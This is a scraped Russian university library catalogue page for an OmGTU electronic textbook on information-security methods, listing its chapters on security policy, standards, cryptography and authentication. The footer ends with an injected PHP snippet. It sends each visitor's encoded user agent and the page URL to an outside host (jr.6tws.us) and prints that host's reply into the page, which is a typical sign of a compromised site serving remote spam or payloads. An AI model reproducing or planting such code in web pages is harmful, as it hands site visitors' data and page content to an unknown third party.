Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

396 пользователей


Зарегистрированных: 1 

Борисенко Виктория Александровна


 
      Наши партнеры
Студенческий информационный портал компании
("Шифр документа=F148CFA6-93E3-CC10-4324-52299CBB5240$")И((("UDC=004.056$"))И("Вид/Тип документа=EXT"))
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 1
1. 
F148CFA6-93E3-CC10-4324-52299CBB5240
F148CFA6-93E3-CC10-4324-52299CBB5240
004/Н64
Никонов, Александр Васильевич.
Методы и средства защиты информации [Электронный ресурс] / А. В. Никонов ; ОмГТУ. - Электрон. текстовые дан. (1,54 Мб). - Омск : Изд-во ОмГТУ, 2014. - 1 эл. опт. диск (CD-ROM) : цв. - Систем. требования: ПРОЦЕССОР INTEL Pentium 1,3 ГГц и выше ; ОПЕРАТИВНАЯ ПАМЯТЬ 256 Мб ; ОПЕРАЦИОННАЯ СИСТЕМА MICROSOFT WINDOWS XP/Vista/7 ; Программа Adobe Reader v 5.0 и выше. - Загл. с этикетки диска. - 320.00 р.
Воспр. по печ. изд. 2006 г.
Содержание:
1. Основные понятия и определения. - С. 5
1.1. Основные определения информационной безопасности компьютерных систем. - С. 11
2. Источники риска и формы атак на информацию. - С. 14
3. Политика безопасности. - С. 22
3.1. Понятие доступа и мониторинг безопасности. - С. 23
3.2. Основные типы политики безопасности. - С. 26
3.3. Реализация политики безопасности. - С. 28
3.4. Построения изолированной программной среды. - С. 30
3.5. Домены безопасности. - С. 39
4. Стандарты безопасности. - С. 40
4.1. Основные положения концепции защиты СВТ и АС от несанкционированного доступа к информации. - С. 42
4.2. Показатели защищенности СВТ и НСД. - С. 43
4.3. Классы защищенности АС. - С. 43
4.4. Некоторые особенности "Критериев безопасности компьютерных систем министерства обороны США" ("Оранжевая книга"). - С. 47
4.5. Некоторые особенности европейских критериев безопасности информационных технологий. - С. 49
4.6. Некоторые особенности федеральных критериев безопасности США для информационных технологий. - С. 49
5. Криптографические модели. - С. 53
5.1. Криптосистемы и криптозащита. - С. 57
6. Алгоритмы шифрования. - С. 61
6.1. Блочные шифры. - С. 62
6.2. Поточные шифры. - С. 70
6.3. Ключи в асимметричной криптосистеме RSA. - С. 71
6.4. Технологии шифрования. - С. 72
7. Алгоритмы аутентификации пользователей. - С. 75
7.1. Типовые схемы идентификации и аутентификации пользователя. - С. 81
7.2. Применение пароля для аутентификации . - С. 82
7.3. Биометрическая идентификация и аутентификация. - С. 83
7.4. Взаимная проверка подлинности пользователей. - С. 84
8. Многоуровневая защита корпоративных сетей. - С. 86
8.1. Корпоративные сети с многоуровневой коммутацией. - С. 92
8.2. Защита информации в базах данных. - С. 93
9. Защита информации в сетях. - С. 96
9.1. Потенциальные угрозы безопасности информации в ЛВС. - С. 97
9.2. Система защиты информации от НСД в ЛВС. - С. 98
9.3. Оценка уровня безопасности информации от преднамеренного НСД в ЛВС. - С. 105
9.4. Защита информации в глобальной сети Internet. - С. 107
9.5. Информационная безопасность в Internet. - С. 111
10. Требования к системам защиты информации. - С. 112
10.1. Общие требования. - С. 112
10.2. Организационные требования. - С. 114
10.3. Требования к подсистемам защиты информации. - С. 117
10.4. Требования к техническому обеспечению. - С. 118
10.5. Требование к программному обеспечению. - С. 119
10.6. Требования по применению способов, методов и средств защиты . - С. 123
10.7. Требования к документированию. - С. 125
10.8. Требования к составу проектной и эксплуатационной документации. - С. 126
10.9. Перечень основных функциональных задач, которые должна решать СЗИ. - С. 127
10.10. Требования по защите информации от утечки по каналам ПЭМИН. - С. 128
10.11. Требования по защите от перехвата ПЭМИН. - С. 129
10.12. Требования по защите системы заземления объекта. - С. 129
10.13. Требования по защите систем электроснабжения объекта. - С. 130
Библиографический список. - С. 134
УДК 004.056.53(075)

Рубрики:
Защита информации -- Электронные учебники
Информация -- Защита -- Электронные учебники
30 (Информационно-измерительная техника)
Информационно-измерительная техника
Учебники и пособия -- Очное обучение

Кл.слова (ненормированные): ОМПИ -- ОМГТУ -- ЭЛЕКТРОННЫЙ РЕСУРС -- ЭЛЕКТРОННЫЙ УЧЕБНИК -- КОМПАКТ-ДИСК -- ОПТИЧЕСКИЙ ДИСК -- УЧЕБНИК И ПОСОБИЕ
Аннотация: Приведены основные теоретические положения защиты информации в информационных системах, понятие политики безопасности для программных комплексов, сведения о стандартах безопасности, необходимые аспекты криптографии, алгоритмов шифрования и аутентификации. Показана суть многоуровневой защиты корпоративных сетей и положения по защите информации в сетях. Приведены требования к системам защиты информации и их содержанию.
Конспект лекций предназначен для студентов специальности 230102 и направления 230100.
Доп. точки доступа:
Омский государственный технический университет (Омск)

Нет сведений об экземплярах
Держатели документа:
Омский государственный технический университет : Россия, 644050, г. Омск, проспект Мира, 11
Оглавление 
  • Основные понятия и определения. - с.5
  • Основные определения информационной безопасности компьютерных систем. - с.11
  • Источники риска и формы атак на информацию. - с.14
  • Политика безопасности. - с.22
  • Понятие доступа и мониторинг безопасности. - с.23
  • Основные типы политики безопасности. - с.26
  • Реализация политики безопасности. - с.28
  • Построения изолированной программной среды. - с.30
  • Домены безопасности. - с.39
  • Стандарты безопасности. - с.40
  • Основные положения концепции защиты СВТ и АС от несанкционированного доступа к информации. - с.42
  • Показатели защищенности СВТ и НСД. - с.43
  • Классы защищенности АС. - с.43
  • Некоторые особенности "Критериев безопасности компьютерных систем министерства обороны США" ("Оранжевая книга"). - с.47
  • Некоторые особенности европейских критериев безопасности информационных технологий. - с.49
  • Некоторые особенности федеральных критериев безопасности США для информационных технологий. - с.49
  • Криптографические модели. - с.53
  • Криптосистемы и криптозащита. - с.57
  • Алгоритмы шифрования. - с.61
  • Блочные шифры. - с.62
  • Поточные шифры. - с.70
  • Ключи в асимметричной криптосистеме RSA. - с.71
  • Технологии шифрования. - с.72
  • Алгоритмы аутентификации пользователей. - с.75
  • Типовые схемы идентификации и аутентификации пользователя. - с.81
  • Применение пароля для аутентификации . - с.82
  • Биометрическая идентификация и аутентификация. - с.83
  • Взаимная проверка подлинности пользователей. - с.84
  • Многоуровневая защита корпоративных сетей. - с.86
  • Корпоративные сети с многоуровневой коммутацией. - с.92
  • Защита информации в базах данных. - с.93
  • Защита информации в сетях. - с.96
  • Потенциальные угрозы безопасности информации в ЛВС. - с.97
  • Система защиты информации от НСД в ЛВС. - с.98
  • Оценка уровня безопасности информации от преднамеренного НСД в ЛВС. - с.105
  • Защита информации в глобальной сети Internet. - с.107
  • Информационная безопасность в Internet. - с.111
  • Требования к системам защиты информации. - с.112
  • Общие требования. - с.112
  • Организационные требования. - с.114
  • Требования к подсистемам защиты информации. - с.117
  • Требования к техническому обеспечению. - с.118
  • Требование к программному обеспечению. - с.119
  • Требования по применению способов, методов и средств защиты . - с.123
  • Требования к документированию. - с.125
  • Требования к составу проектной и эксплуатационной документации. - с.126
  • Перечень основных функциональных задач, которые должна решать СЗИ. - с.127
  • Требования по защите информации от утечки по каналам ПЭМИН. - с.128
  • Требования по защите от перехвата ПЭМИН. - с.129
  • Требования по защите системы заземления объекта. - с.129
  • Требования по защите систем электроснабжения объекта. - с.130
  • Библиографический список. - с.134
Держатели документа (Информация об экземплярах) 

Приведены основные теоретические положения защиты информации в информационных системах, понятие политики безопасности для программных комплексов, сведения о стандартах безопасности, необходимые аспекты <криптографии>, алгоритмов <шифрования> и <аутентификации>. Показана суть многоуровневой защиты <корпоративных> <сетей> и положения по защите информации в сетях. Приведены требования к системам защиты информации и их содержанию.

Конспект лекций предназначен для студентов специальности 230102 и направления 230100.

Полный текст


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2839 - 19.03.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.51 с.14 запросов, 1.29c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;